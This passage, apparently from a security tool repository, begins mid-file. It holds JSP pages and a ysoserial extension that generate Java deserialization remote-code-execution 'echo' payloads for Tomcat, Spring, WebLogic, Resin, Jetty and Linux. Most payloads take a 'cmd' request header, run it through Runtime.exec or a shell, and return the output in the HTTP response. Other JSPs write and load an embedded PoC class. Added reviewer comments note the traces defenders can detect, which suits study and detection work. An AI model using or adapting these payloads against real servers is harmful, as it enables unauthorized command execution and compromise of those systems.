4 | java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)executeThread.getCurrentWork()).getClass().getDeclaredField("connectionHandler"); // cast fails with ClassCastException if the work item is not a WlsRequestExecutor
5 | field.setAccessible(true);
6 | weblogic.servlet.internal.HttpConnectionHandler httpConn = (weblogic.servlet.internal.HttpConnectionHandler) field.get(executeThread.getCurrentWork());
7 | String cmd = "echo \"It works!\""; // hard-coded command string
8 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); // reads the child's whole stdout as one token
9 | httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(res));
10 | httpConn.getServletRequest().getResponse().getServletOutputStream().flush();
11 | httpConn.getServletRequest().getResponse().getWriter().write("");
12 | %>
--------------------------------------------------------------------------------
/weblogic/img/x001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/weblogic/img/x001.png
--------------------------------------------------------------------------------
/weblogic/img/x002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/weblogic/img/x002.png
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/README.md:
--------------------------------------------------------------------------------
1 | # 全自动挖掘 request 回显
2 | ## 效果
3 | 
4 | 
5 | ## 参考
6 | * [基于请求/响应对象搜索的Java中间件通用回显方法(针对HTTP)](https://blog.csdn.net/fnmsd/article/details/106709736)
7 | * [Java中间件通用回显方法的问题及处理(7.7更新)](https://blog.csdn.net/fnmsd/article/details/106890242)
8 |
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step1-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="sun.misc.BASE64Decoder" %>
2 | <%@ page import="java.io.IOException" %>
3 | <%@ page import="java.util.Arrays" %>
4 | <%@ page import="sun.misc.BASE64Encoder" %>
5 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
6 | <%
7 | String p = Thread.currentThread().getContextClassLoader().getResource("").getPath(); // Review: this scriptlet decodes an embedded Base64 blob and writes it as PoC.class into the directory the context class loader reports for the empty resource name. getResource("") may return null, in which case this line throws NullPointerException.
8 | p = java.net.URLDecoder.decode(p,"utf-8"); // undoes URL escaping (for example %20) in the path
9 | java.io.OutputStream os = new java.io.FileOutputStream(p + "PoC.class"); // defender view: a new .class file appearing under a deployed application's class-path root is the file-system trace of this page
10 | sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder(); // JDK-internal decoder class, not part of the supported API
11 | java.io.InputStream in = new java.io.ByteArrayInputStream(d.decodeBuffer("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"));
12 |
13 | byte[] f = new byte[1024];
14 | int l = 0;
15 | while((l=in.read(f))!=-1){ // copies the decoded bytes to the file in chunks of up to 1024 bytes
16 | os.write(f, 0, l);
17 | }
18 | in.close();
19 | os.close(); // both streams stay open if anything above throws; there is no try/finally
20 |
21 | // String p = Thread.currentThread().getContextClassLoader().getResource("").getPath();
22 | // p = java.net.URLDecoder.decode(p,"utf-8");
23 | // java.io.OutputStream os = new java.io.FileOutputStream(p + "PoC.class");
24 | // String content = "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";
25 | // BASE64Decoder decoder = new BASE64Decoder();
26 | // byte[] bytes = decoder.decodeBuffer(content);
27 | //
28 | // int length = bytes.length;
29 | // int start = 0;
30 | // int end = 0;
31 | // BASE64Encoder encoder = new BASE64Encoder();
32 | // while(start < length){
33 | // end = (start + 1000 > length) ? (end + 1000) : length;
34 | // byte[] temp = Arrays.copyOfRange(bytes, start, end);
35 | // start = end;
36 | //
37 | // String part = encoder.encode(temp).replaceAll("\r|\n|\r\n", "");
38 | // sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder();
39 | // java.io.InputStream in = new java.io.ByteArrayInputStream(d.decodeBuffer(part));
40 | //
41 | // byte[] f = new byte[1024];
42 | // int l = 0;
43 | // while((l=in.read(f))!=-1){
44 | // os.write(f, 0, l);
45 | // }
46 | // in.close();
47 | // os.close();
48 | // }
49 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step1.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="sun.misc.BASE64Decoder" %>
2 | <%@ page import="java.io.IOException" %>
3 | <%@ page import="java.util.Arrays" %>
4 | <%@ page import="sun.misc.BASE64Encoder" %>
5 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
6 | <%
7 | try { // Review: decodes an embedded Base64 blob and writes it as PoC.class into a fixed temporary directory chosen by path separator
8 | String path;
9 | if (java.io.File.separator.equals("/")) {
10 | path = "/tmp/";
11 | } else {
12 | path = "c:/windows/temp/";
13 | }
14 |
15 | java.io.OutputStream os = new java.io.FileOutputStream(path + "PoC.class"); // defender view: a PoC.class file created in the temp directory by the server process is the file-system trace of this page
16 | String content = "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";
17 | byte[] bytes = java.util.Base64.getDecoder().decode(content); // throws IllegalArgumentException on invalid Base64, caught below
18 | os.write(bytes);
19 | os.close(); // skipped if decode or write throws; the stream is not closed on that path
20 |
21 | }catch (Exception e){
22 | e.printStackTrace(); // failure is only printed to the server's standard error stream
23 | }
24 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step2-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Class.forName("PoC").newInstance(); // Review: loads a class named PoC through the JSP class's defining loader and runs its no-argument constructor; whatever that constructor and the class's static initializer contain executes inside the server JVM. The class itself is not part of this file.
4 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step2.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | java.net.URL url; // Review: this scriptlet builds a class loader over a fixed temporary directory, loads a class named PoC from it and instantiates it
4 | if (java.io.File.separator.equals("/")) {
5 | url = new java.net.URL("file:///tmp/");
6 | }else{
7 | url = new java.net.URL("file:///c:/windows/temp/");
8 | }
9 | java.net.URLClassLoader urlClassLoader = new java.net.URLClassLoader(new java.net.URL[]{url}, Thread.currentThread().getContextClassLoader()); // parent-first delegation: the context class loader is asked for PoC before the temp directory is searched; the loader is never closed
10 | urlClassLoader.loadClass("PoC").newInstance(); // defender view: class loading from a temp directory by the server JVM, and the PoC.class file itself, are the traces to look for; the constructor's code runs with the server's privileges
11 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/img/step1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/全自动挖掘 request 回显/img/step1.png
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/img/step2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/全自动挖掘 request 回显/img/step2.png
--------------------------------------------------------------------------------
/写文件/README.md:
--------------------------------------------------------------------------------
1 | # 写文件回显
2 | ## 效果
3 | 
4 | 
5 |
--------------------------------------------------------------------------------
/写文件/code/writeFile.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | String path = Thread.currentThread().getContextClassLoader().getResource("").getPath(); // Review: this scriptlet runs a fixed echo command and stores its output in a file named echo.js in the directory above WEB-INF
4 | path = path.substring(0, path.indexOf("WEB-INF")); // indexOf returns -1 when the path has no WEB-INF part, and substring(0, -1) then throws StringIndexOutOfBoundsException
5 | String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!\"").getInputStream()).useDelimiter("\\A").next(); // hard-coded command; no request input is read
6 | java.io.PrintWriter printWriter = new java.io.PrintWriter(path + "echo.js"); // defender view: an unexpected static file created by the server process in the web root is the trace of this page; the path is not URL-decoded here
7 | printWriter.println(res);
8 | printWriter.close();
9 | %>
--------------------------------------------------------------------------------
/写文件/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/写文件/img/001.png
--------------------------------------------------------------------------------
/写文件/img/002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/写文件/img/002.png
--------------------------------------------------------------------------------
/集成到ysoserial/DirectiveProcessor.java:
--------------------------------------------------------------------------------
1 | package ysoserial.my;
2 |
3 | import java.io.*;
4 | import java.util.Arrays;
5 | import sun.misc.BASE64Decoder;
6 | import sun.misc.BASE64Encoder;
7 |
8 | public class DirectiveProcessor{
9 | public static void main(String[] args) throws IOException { // Demo entry point: prints the text that process() returns for one hard-coded sample directive; args is unused
10 | System.out.println(process("directive:WindowsEcho:whoami"));
11 | }
12 |
13 | public static String process(String command){ // Maps a command string to a piece of Java source returned as text. Judging by the helpers visible in this file, the method only builds strings and executes nothing itself. Returns "" for null or blank input.
14 | if(command == null || command.trim().equals("")){
15 | return "";
16 | }
17 |
18 |
19 | // LinuxEcho("LinuxEcho"),
20 | // WindowsEcho("WindowsEcho"),
21 | // SpringEcho1("SpringEcho1"),
22 | // SpringEcho2("SpringEcho2"),
23 | // TomcatEcho("TomcatEcho"),
24 | // WeblogicEcho1("WeblogicEcho1"),
25 | // WeblogicEcho2("WeblogicEcho2"),
26 | // ResinEcho("ResinEcho"),
27 | // JettyEcho("JettyEcho"),
28 | // AutoFindRequestEcho("AutoFindRequestEcho"),
29 | // WriteFileEcho("WriteFileEcho");
30 |
31 | command = command.trim();
32 | if(command.startsWith("directive:sleep")){ // prefix match only: the branches are tested in order and the first matching prefix wins
33 | long time = Long.parseLong(command.split(":", 3)[2]); // throws ArrayIndexOutOfBoundsException when there is no third ':' field, NumberFormatException when it is not a long
34 | return sleep(time);
35 | }else if(command.startsWith("directive:LinuxEcho")){
36 | return linuxEcho(command);
37 | }else if(command.startsWith("directive:WindowsEcho")){
38 | return windowsEcho(command);
39 | }else if(command.startsWith("directive:SpringEcho1")){
40 | return springEcho1();
41 | }else if(command.startsWith("directive:SpringEcho2")){
42 | return springEcho2();
43 | }else if(command.startsWith("directive:TomcatEcho")){
44 | return tomcatEcho();
45 | }else if(command.startsWith("directive:WeblogicEcho1")){
46 | return weblogicEcho1();
47 | }else if(command.startsWith("directive:WeblogicEcho2")){
48 | return weblogicEcho2(command);
49 | }else if(command.startsWith("directive:ResinEcho")){
50 | return resinEcho();
51 | }else if(command.startsWith("directive:JettyEcho")){
52 | return jettyEcho();
53 | }else if(command.startsWith("directive:AutoFindRequestEcho")){
54 | return autoFindRequestEcho();
55 | }else if(command.startsWith("directive:WriteFileEcho")){
56 | return wirteFileEcho(command); // helper name is spelled "wirte" at this call site; its declaration is outside this excerpt
57 | }else if(command.startsWith("directive:WriteClass")){
58 | return writeClass(Integer.parseInt(command.split(":",3)[2])); // same two exceptions as the sleep branch, with an int instead of a long
59 | } else if(command.startsWith("directive:Shell")){
60 | return shell(command);
61 | }else{ // no directive prefix matched: the text goes through two replaceAll calls (backslash, double quote) and is embedded in a Runtime.exec(...) call written out as source text
62 | return "java.lang.Runtime.getRuntime().exec(\"" +
63 | command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
64 | "\");";
65 | }
66 | }
67 |
68 | public static String sleep(long seconds){ // Returns the source text of a Thread.sleep call for the given number of seconds; the calling thread is not put to sleep here
69 | long time = seconds * 1000; // seconds to milliseconds; plain long multiplication, so very large inputs wrap around silently
70 | String code = "java.lang.Thread.sleep((long)" + time + ");";
71 | return code;
72 | }
73 |
74 | public static String linuxEcho(String command){ // Returns a Java source template as text, with the third ':'-separated field of command spliced into one string literal (the "cmd = new String[]" line near the end). Nothing is executed by this method.
75 | String cmd = command.split(":", 3)[2]; // throws ArrayIndexOutOfBoundsException when command has fewer than three ':' fields
76 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\""); // two replaceAll passes (backslash, double quote) before the text is embedded
77 |
78 | String code = " if(java.io.File.separator.equals(\"/\")){\n" + // template: whole body is guarded by a "/" path-separator check
79 | " String command = \"ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\\\"[\\\"}''{print $2}'|sed 's/.$//'\";\n" + // template: first listing of socket entries under /proc/$PPID/fd
80 | " String[] cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" + // defender view: a server JVM spawning /bin/sh -c with an "ls -al /proc/..." pipeline is the process-level trace of the generated code
81 | " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" +
82 | " java.util.List res1 = new java.util.ArrayList();\n" +
83 | " String line = \"\";\n" +
84 | " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" +
85 | " res1.add(line);\n" +
86 | " }\n" +
87 | " br.close();\n" +
88 | "\n" +
89 | " try {\n" +
90 | " Thread.sleep((long)2000);\n" + // template: two-second pause between the two listings
91 | " } catch (InterruptedException e) {\n" +
92 | " //pass\n" +
93 | " }\n" +
94 | "\n" +
95 | " command = \"ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'\";\n" + // template: second listing, this time two columns per entry
96 | " cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" +
97 | " br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" +
98 | " java.util.List res2 = new java.util.ArrayList();\n" +
99 | " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" +
100 | " res2.add(line);\n" +
101 | " }\n" +
102 | " br.close();\n" +
103 | "\n" +
104 | " int index = 0;\n" +
105 | " int max = 0;\n" +
106 | " for(int i = 0; i < res2.size(); i++){\n" + // template: compares the second listing with the first and remembers the index belonging to the largest matching socket number
107 | " try{\n" +
108 | " String socketNo = ((String)res2.get(i)).split(\"\\\\s+\")[1].substring(8);\n" +
109 | " socketNo = socketNo.substring(0, socketNo.length() - 1);\n" +
110 | " for(int j = 0; j < res1.size(); j++){\n" +
111 | " if(!socketNo.equals(res1.get(j))) continue;\n" +
112 | "\n" +
113 | " if(Integer.parseInt(socketNo) > max) {\n" +
114 | " max = Integer.parseInt(socketNo);\n" +
115 | " index = j;\n" +
116 | " }\n" +
117 | " break;\n" +
118 | " }\n" +
119 | " }catch(Exception e){\n" +
120 | " //pass\n" +
121 | " }\n" +
122 | " }\n" +
123 | "\n" +
124 | " int fd = Integer.parseInt(((String)res2.get(index)).split(\"\\\\s\")[0]);\n" +
125 | " java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});\n" + // template: reflective access to FileDescriptor's non-public int constructor
126 | " c.setAccessible(true);\n" +
127 | " cmd = new String[]{\"/bin/sh\", \"-c\", \"" + cmd + "\"};\n" + // the caller-supplied text is concatenated into the generated source here
128 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
129 | " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" + // template: hand-built HTTP response text
130 | " java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));\n" + // template: the response is written to a stream opened on the chosen descriptor number, not through a servlet response
131 | " os.write(result.getBytes());\n" +
132 | " }";
133 |
134 | return code;
135 | }
136 |
137 | public static String springEcho1(){ // Returns a fixed Java source template as text; no caller input is spliced in and nothing is executed by this method
138 | String code = " java.lang.reflect.Method method = Class.forName(\"org.springframework.web.context.request.RequestContextHolder\").getMethod(\"getRequestAttributes\", null);\n" + // template: reaches the current request through Spring's RequestContextHolder by reflection
139 | " Object requestAttributes = method.invoke(null,null);\n" +
140 | "\n" +
141 | " method = requestAttributes.getClass().getMethod(\"getRequest\", null);\n" +
142 | " Object request = method.invoke(requestAttributes , null);\n" +
143 | "\n" +
144 | " method = request.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
145 | " String cmd = (String) method.invoke(request, new Object[]{\"cmd\"});\n" + // defender view: the generated code keys on a request header literally named "cmd"
146 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + // template: the header value goes to Runtime.exec without any check
147 | "\n" +
148 | " method = requestAttributes.getClass().getMethod(\"getResponse\", null);\n" +
149 | " Object response = method.invoke(requestAttributes , null);\n" +
150 | "\n" +
151 | " method = response.getClass().getMethod(\"getWriter\", null);\n" +
152 | " java.io.PrintWriter printWriter = (java.io.PrintWriter) method.invoke(response, null);\n" +
153 | " printWriter.println(res);"; // template: command output is printed to the response writer
154 |
155 | return code;
156 | }
157 |
158 | public static String springEcho2(){ // Returns a fixed Java source template as text; same shape as springEcho1 but the request and response are reached through Spring Web Flow's ExternalContextHolder
159 | String code = "java.lang.reflect.Method method = Class.forName(\"org.springframework.webflow.context.ExternalContextHolder\").getMethod(\"getExternalContext\", null);\n" + // template: reflective lookup of the current external context
160 | " Object servletExternalContext = method.invoke(null,null);\n" +
161 | "\n" +
162 | " method = servletExternalContext.getClass().getMethod(\"getNativeRequest\", null);\n" +
163 | " Object request = method.invoke(servletExternalContext , null);\n" +
164 | "\n" +
165 | " method = request.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
166 | " String cmd = (String) method.invoke(request, new Object[]{\"cmd\"});\n" + // defender view: the generated code keys on a request header literally named "cmd"
167 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + // template: the header value goes to Runtime.exec without any check
168 | "\n" +
169 | " method = servletExternalContext.getClass().getMethod(\"getNativeResponse\", null);\n" +
170 | " Object response = method.invoke(servletExternalContext , null);\n" +
171 | "\n" +
172 | " method = response.getClass().getMethod(\"getWriter\", null);\n" +
173 | " java.io.PrintWriter printWriter = (java.io.PrintWriter) method.invoke(response, null);\n" +
174 | " printWriter.println(res);"; // template: command output is printed to the response writer
175 |
176 | return code;
177 | }
178 |
179 | public static String tomcatEcho(){ // Returns a fixed Java source template as text; no caller input is spliced in and nothing is executed by this method
180 | String code = " boolean flag = false;\n" +
181 | " ThreadGroup group = Thread.currentThread().getThreadGroup();\n" +
182 | " java.lang.reflect.Field f = group.getClass().getDeclaredField(\"threads\");\n" + // template: reads ThreadGroup's private "threads" array by reflection
183 | " f.setAccessible(true);\n" +
184 | " Thread[] threads = (Thread[]) f.get(group);\n" +
185 | "\n" +
186 | " for(int i = 0; i < threads.length; i++) {\n" +
187 | " try{\n" +
188 | " Thread t = threads[i];\n" +
189 | " if (t == null) continue;\n" +
190 | "\n" +
191 | " String str = t.getName();\n" +
192 | " if (str.contains(\"exec\") || !str.contains(\"http\")) continue;\n" + // template: only threads whose name contains "http" and not "exec" are inspected
193 | "\n" +
194 | "\n" +
195 | " f = t.getClass().getDeclaredField(\"target\");\n" + // template: from here a chain of private fields (target, this$0, handler, global, processors, req) is followed
196 | " f.setAccessible(true);\n" +
197 | " Object obj = f.get(t);\n" +
198 | "\n" +
199 | " if (!(obj instanceof Runnable)) continue;\n" +
200 | "\n" +
201 | " f = obj.getClass().getDeclaredField(\"this$0\");\n" +
202 | " f.setAccessible(true);\n" +
203 | " obj = f.get(obj);\n" +
204 | "\n" +
205 | " try{\n" +
206 | " f = obj.getClass().getDeclaredField(\"handler\");\n" +
207 | " }catch (NoSuchFieldException e){\n" +
208 | " f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\");\n" + // template: falls back to the class two levels up when "handler" is not declared directly
209 | " }\n" +
210 | " f.setAccessible(true);\n" +
211 | " obj = f.get(obj);\n" +
212 | "\n" +
213 | " try{\n" +
214 | " f = obj.getClass().getSuperclass().getDeclaredField(\"global\");\n" +
215 | " }catch(NoSuchFieldException e){\n" +
216 | " f = obj.getClass().getDeclaredField(\"global\");\n" +
217 | " }\n" +
218 | " f.setAccessible(true);\n" +
219 | " obj = f.get(obj);\n" +
220 | "\n" +
221 | " f = obj.getClass().getDeclaredField(\"processors\");\n" +
222 | " f.setAccessible(true);\n" +
223 | " java.util.List processors = (java.util.List)(f.get(obj));\n" +
224 | "\n" +
225 | " for(int j = 0; j < processors.size(); ++j) {\n" +
226 | " Object processor = processors.get(j);\n" +
227 | " f = processor.getClass().getDeclaredField(\"req\");\n" +
228 | " f.setAccessible(true);\n" +
229 | " Object req = f.get(processor);\n" +
230 | " Object resp = req.getClass().getMethod(\"getResponse\", new Class[0]).invoke(req, new Object[0]);\n" +
231 | "\n" +
232 | " str = (String)req.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(req, new Object[]{\"cmd\"});\n" + // defender view: the generated code keys on a request header literally named "cmd"
233 | "\n" +
234 | " if (str != null && !str.isEmpty()) {\n" +
235 | " resp.getClass().getMethod(\"setStatus\", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});\n" +
236 | " String[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", str} : new String[]{\"/bin/sh\", \"-c\", str};\n" + // template: the header value is handed to cmd.exe or /bin/sh depending on os.name
237 | " byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes();\n" + // defender view: a shell child process under the servlet container's JVM is the host-side trace
238 | "\n" +
239 | " try {\n" +
240 | " Class cls = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
241 | " obj = cls.newInstance();\n" +
242 | " cls.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});\n" +
243 | " resp.getClass().getMethod(\"doWrite\", new Class[]{cls}).invoke(resp, new Object[]{obj});\n" +
244 | " } catch (NoSuchMethodException var5) {\n" + // template: when doWrite(ByteChunk) is not found, doWrite(ByteBuffer) is tried instead
245 | " Class cls = Class.forName(\"java.nio.ByteBuffer\");\n" +
246 | " obj = cls.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(cls, new Object[]{result});\n" +
247 | " resp.getClass().getMethod(\"doWrite\", new Class[]{cls}).invoke(resp, new Object[]{obj});\n" +
248 | " }\n" +
249 | "\n" +
250 | " flag = true;\n" +
251 | " }\n" +
252 | "\n" +
253 | " if (flag) break;\n" +
254 | " }\n" +
255 | "\n" +
256 | " if (flag) break;\n" + // template: both loops stop after the first response that was written
257 | " }catch(Exception e){\n" + // template: any exception while inspecting one thread is swallowed and the next thread is tried
258 | " continue;\n" +
259 | " }\n" +
260 | " }";
261 |
262 | return code;
263 | }
264 |
265 | public static String weblogicEcho1(){ // Returns a fixed Java source template as text; no caller input is spliced in and nothing is executed by this method
266 | String code = " Object obj = Thread.currentThread().getClass().getMethod(\"getCurrentWork\", null).invoke(Thread.currentThread(), null);\n" + // template: calls getCurrentWork on the current thread reflectively; NoSuchMethodException on thread classes without that method
267 | " String cmd = (String) obj.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(obj, new Object[]{\"cmd\"});\n" + // defender view: the generated code keys on a request header literally named "cmd"
268 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + // template: the header value goes to Runtime.exec without any check
269 | " Object r = obj.getClass().getMethod(\"getResponse\", null).invoke(obj, null);\n" +
270 | " Object os = r.getClass().getMethod(\"getServletOutputStream\", null).invoke(r, null);\n" +
271 | " obj = Class.forName(\"weblogic.xml.util.StringInputStream\").getConstructor(new Class[]{String.class}).newInstance(new Object[]{res});\n" +
272 | "\n" +
273 | " os.getClass().getMethod(\"writeStream\", new Class[]{Class.forName(\"java.io.InputStream\")}).invoke(os, new Object[]{obj});\n" + // template: command output is streamed to the servlet output stream, then flushed
274 | " os.getClass().getMethod(\"flush\", null).invoke(os, null);\n" +
275 | " obj = r.getClass().getMethod(\"getWriter\", null).invoke(r, null);\n" +
276 | " obj.getClass().getMethod(\"write\", new Class[]{String.class}).invoke(obj, new Object[]{\"\"});";
277 |
278 | return code;
279 | }
280 |
281 | public static String weblogicEcho2(String command){ // Returns a Java source template as text, with the third ':'-separated field of command spliced into the template's "String cmd" literal. Nothing is executed by this method.
282 | String cmd = command.split(":", 3)[2]; // throws ArrayIndexOutOfBoundsException when command has fewer than three ':' fields
283 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\""); // two replaceAll passes (backslash, double quote) before the text is embedded
284 |
285 | String code = "Object obj = Thread.currentThread().getClass().getMethod(\"getCurrentWork\", null).invoke(Thread.currentThread(), null);\n" +
286 | " Field field = obj.getClass().getDeclaredField(\"connectionHandler\");\n" + // template: reads the work item's private connectionHandler field
287 | " field.setAccessible(true);\n" +
288 | " obj = field.get(obj);\n" +
289 | " String cmd = \"" + cmd + "\";\n" + // the caller-supplied text is concatenated into the generated source here; this variant reads no request header
290 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + // defender view: a child process spawned by the application-server JVM is the host-side trace of the generated code
291 | "\n" +
292 | " Object r = obj.getClass().getMethod(\"getServletRequest\", null).invoke(obj, null);\n" +
293 | " Object o = r.getClass().getMethod(\"getResponse\", null).invoke(r, null);\n" +
294 | " Object s = o.getClass().getMethod(\"getServletOutputStream\", null).invoke(o, null);\n" +
295 | "\n" +
296 | " obj = Class.forName(\"weblogic.xml.util.StringInputStream\").getConstructor(new Class[]{String.class}).newInstance(new Object[]{res});\n" +
297 | "\n" +
298 | " s.getClass().getMethod(\"writeStream\", new Class[]{Class.forName(\"java.io.InputStream\")}).invoke(s, new Object[]{obj});\n" + // template: command output is streamed to the servlet output stream, then flushed
299 | " s.getClass().getMethod(\"flush\", null).invoke(s, null);\n" +
300 | " obj = o.getClass().getMethod(\"getWriter\", null).invoke(o, null);\n" +
301 | " obj.getClass().getMethod(\"write\", new Class[]{String.class}).invoke(obj, new Object[]{\"\"});";
302 |
303 | return code;
304 | }
305 |
306 | public static String resinEcho(){ // Returns a fixed Java source template as text; no caller input is spliced in and nothing is executed by this method
307 | String code = " Class clazz = Thread.currentThread().getClass();\n" +
308 | " java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField(\"threadLocals\");\n" + // template: looks for the threadLocals field on the superclass of the current thread's class
309 | " field.setAccessible(true);\n" +
310 | " Object obj = field.get(Thread.currentThread());\n" +
311 | "\n" +
312 | " field = obj.getClass().getDeclaredField(\"table\");\n" + // template: private entry table of the thread-local map
313 | " field.setAccessible(true);\n" +
314 | " obj = field.get(obj);\n" +
315 | "\n" +
316 | " Object[] obj_arr = (Object[]) obj;\n" +
317 | " for(int i = 0; i < obj_arr.length; i++) {\n" + // template: scans every thread-local entry for a value of the Resin request class
318 | " Object o = obj_arr[i];\n" +
319 | " if (o == null) continue;\n" +
320 | "\n" +
321 | " field = o.getClass().getDeclaredField(\"value\");\n" +
322 | " field.setAccessible(true);\n" +
323 | " obj = field.get(o);\n" +
324 | "\n" +
325 | " if(obj != null && obj.getClass().getName().equals(\"com.caucho.server.http.HttpRequest\")){\n" +
326 | " com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;\n" +
327 | " String cmd = httpRequest.getHeader(\"cmd\");\n" + // defender view: the generated code keys on a request header literally named "cmd"
328 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + // template: the header value goes to Runtime.exec without any check
329 | " com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();\n" +
330 | " httpResponse.setHeader(\"Content-Length\", res.length() + \"\");\n" +
331 | " java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod(\"createResponseStream\", null);\n" +
332 | " method.setAccessible(true);\n" +
333 | " com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);\n" +
334 | " httpResponseStream.write(res.getBytes(), 0, res.length());\n" + // template: command output is written to a response stream created reflectively, then the stream is closed
335 | " httpResponseStream.close();\n" +
336 | " }\n" +
337 | " }";
338 |
339 | return code;
340 | }
341 |
/**
 * Returns a fixed Java source fragment, as a String, written against Jetty connection
 * classes. Nothing is executed by this method itself.
 *
 * <p>What the fragment in the literal does: it reads the private {@code threadLocals}
 * field declared on the current thread's class, walks its {@code table} array, and
 * inspects the {@code value} field of each non-null entry. Two cases are handled by
 * class-name suffix:
 * <ul>
 *   <li>{@code ...AsyncHttpConnection}: request via {@code getRequest()}, output via
 *       {@code getPrintWriter("utf-8")} on the connection;</li>
 *   <li>{@code ...HttpConnection}: request and response via {@code getHttpChannel()},
 *       output via the response's {@code getWriter()}.</li>
 * </ul>
 * In both cases the value of the request header {@code cmd} is passed to
 * {@code Runtime.exec} and the process output is printed to the HTTP response.
 *
 * <p>Observable traits for a reviewer or defender, all taken from the literal: a request
 * header named {@code cmd}; a child process started by the server JVM; and reflective
 * {@code setAccessible(true)} access to {@code Thread} internals.
 * NOTE(review): which Jetty versions each branch corresponds to is not stated here;
 * the file names in the repository listing suggest 7/8 versus 9. Confirm this.
 *
 * @return the source fragment; where it is compiled or delivered is not visible in this
 *         part of the file
 */
342 | public static String jettyEcho(){
343 | String code = " Class clazz = Thread.currentThread().getClass();\n" +
344 | " java.lang.reflect.Field field = clazz.getDeclaredField(\"threadLocals\");\n" +
345 | " field.setAccessible(true);\n" +
346 | " Object obj = field.get(Thread.currentThread());\n" +
347 | "\n" +
